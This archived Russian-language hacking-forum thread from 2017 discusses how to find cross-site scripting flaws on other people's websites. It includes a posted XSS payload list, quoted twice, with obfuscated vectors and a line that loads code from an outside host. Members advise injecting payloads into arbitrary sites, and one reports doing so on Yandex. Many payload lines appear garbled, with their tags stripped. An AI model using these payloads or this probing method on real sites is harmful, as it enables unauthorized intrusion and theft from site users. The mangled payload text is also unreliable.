ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.09.2017, 00:39
|
|
Новичок
Регистрация: 06.09.2017
Сообщений: 1
Провел на форуме:
310
Репутация:
0
|
|
Приветствую в моей первой теме!
Если быть кратким, то меня интересует парочка вопросов касательно XSS уязвимости:
- Видел на форуме много тем о XSS, но большинство из них были открыты очень давно(по меркам Web`а), как вы считаете - является ли XSS уязвимость актуальной и по сей день или нет?
- Если же XSS актуальна, можете ли вы поделиться своим опытом поиска уязвимых сайтов?(поверьте, прежде чем задавать этот вопрос сюда, сам перелопатил кучу гору сайтов - безуспешно)
|
|
|
07.09.2017, 00:59
|
|
Участник форума
Регистрация: 22.12.2011
Сообщений: 170
Провел на форуме:
46938
Репутация:
2
|
|
Конечно! таких сайтов дохуя!
Ищи на сайтах формы для ввода каких-то данных и потом ищи их отображение на странице. Лезь в исходный код страницы и ищи как в html выводятся введенные тобой данные.
Если говорить о пассивных xss, то в адресной строке браузера должно быть нечто вроде http://site.com/?search="..."
в качестве параметра подставляй
или сначала тег закрывай "/> а потом алерт()
Active XSS часто встречаются на сайтах, где есть регистрация и личный кабинет. В разные поля можно подставлять алерт, некоторые поля могут выводиться без фильтрации.
|
|
|
|
07.09.2017, 17:45
|
|
Новичок
Регистрация: 29.08.2017
Сообщений: 2
Провел на форуме:
510
Репутация:
0
|
|
Это наверное самая интересная штука, которая позволяет что то воровать
|
|
|
|
26.09.2017, 18:45
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
Где-то слышал что сейчас браузеры лочат ХХС
|
|
|
|
26.09.2017, 22:47
|
|
Новичок
Регистрация: 29.10.2016
Сообщений: 17
Провел на форуме:
3742
Репутация:
0
|
|
Сообщение от brown
↑
Где-то слышал что сейчас браузеры лочат ХХС
они не могу его блочить так как для выполнения xss нужен js А БЕЗ сайты не работают)
|
|
|
|
26.09.2017, 22:49
|
|
Новичок
Регистрация: 29.10.2016
Сообщений: 17
Провел на форуме:
3742
Репутация:
0
|
|
мой маленький набор
Код:
'';!--"=&{()}
xxs link
or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
xxs link
alert("XSS")">
perl -e 'print "";' > out
alert("XSS");//
alert("XSS");
li {list-style-image: url("javascript:alert('XSS')");}XSS
; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
cript:alert('XSS')">
cript:alert('XSS')">
alert("XSS")'); ?>
alert('XSS')">
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|
|
|
13.10.2017, 20:15
|
|
Новичок
Регистрация: 13.10.2017
Сообщений: 2
Провел на форуме:
664
Репутация:
0
|
|
Сообщение от Logol
↑
мой маленький набор
Код:
'';!--"=&{()}
xxs link
or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
xxs link
alert("XSS")">
perl -e 'print "";' > out
alert("XSS");//
alert("XSS");
li {list-style-image: url("javascript:alert('XSS')");}XSS
; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
cript:alert('XSS')">
cript:alert('XSS')">
alert("XSS")'); ?>
alert('XSS')">
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
|
|
|
|
13.10.2017, 20:44
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от StarkMP
↑
Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
Да, хотя вектора можно ещё придумать
|
|
|
|
13.10.2017, 20:46
|
|
Новичок
Регистрация: 13.10.2017
Сообщений: 2
Провел на форуме:
664
Репутация:
0
|
|
Сообщение от karkajoi
↑
Да, хотя вектора можно ещё придумать
Я по приколу вставил это в сайт Яндекса, высветилось сообщение 1 раз. Неужели это уязвимость? Как-то даже не верится...
|
|
|
|
13.10.2017, 21:32
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от StarkMP
↑
Я по приколу вставил это в сайт Яндекса, высветилось сообщение 1 раз. Неужели это уязвимость? Как-то даже не верится...
Возможно, на mail.ru раньше было много, но эксплуатировать сложновато стало, браузеры блочат, надо искать новые вектора и обходы.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
